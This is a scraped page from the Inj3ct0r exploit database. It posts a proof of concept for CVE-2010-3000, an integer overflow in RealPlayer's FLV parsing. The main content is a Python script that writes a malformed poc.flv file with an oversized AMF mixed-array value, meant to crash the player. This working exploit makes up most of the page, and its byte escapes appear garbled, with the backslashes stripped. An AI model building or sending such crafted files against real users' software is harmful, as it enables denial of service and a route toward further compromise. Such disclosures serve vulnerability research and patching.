Home / os / win7

[dos / poc] - RealPlayer FLV Parsing Integer Overflow

Posted on 12 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>RealPlayer FLV Parsing Integer Overflow | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: dos / poc | Exploit author: Abysssec' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>======================================= RealPlayer FLV Parsing Integer Overflow ======================================= ======================================= RealPlayer FLV Parsing Integer Overflow ======================================= Title : RealPlayer FLV Parsing Multiple Integer Overflow Version : RealPlayer SP 1.1.4 Analysis : http://www.abysssec.com Vendor : http://www.real.com Impact : High Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-3000 &#039;&#039;&#039; # POC for CVE-2010-3000 # http://www.exploit-db.com/moaub-13-realplayer-flv-parsing-multiple-integer-overflow/ # http://www.exploit-db.com/sploits/moaub-13-exploit.zip import sys def main(): flvHeader = &#039;x46x4Cx56x01x05x00x00x00x09&#039; flvBody1 = &#039;x00x00x00x00x12x00x00x15x00x00x00x00x00x00x00x02x00x0Ax6Fx6Ex4Dx65x74x61x44x61x74x61x08&#039; HX_FLV_META_AMF_TYPE_MIXEDARRAY_Value = &quot;x07x50x75x08&quot; # if value &gt;= 0x7507508 --&gt; crash flvBody2 = &quot;x00x00x09x00x00x00x20&quot; flv = open(&#039;poc.flv&#039;, &#039;wb+&#039;) flv.write(flvHeader) flv.write(flvBody1) flv.write(HX_FLV_META_AMF_TYPE_MIXEDARRAY_Value) flv.write(flvBody2) flv.close() print &#039;[-] FLV file generated&#039; if __name__ == &#039;__main__&#039;: main() # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-12]</pre></body></html>

 

TOP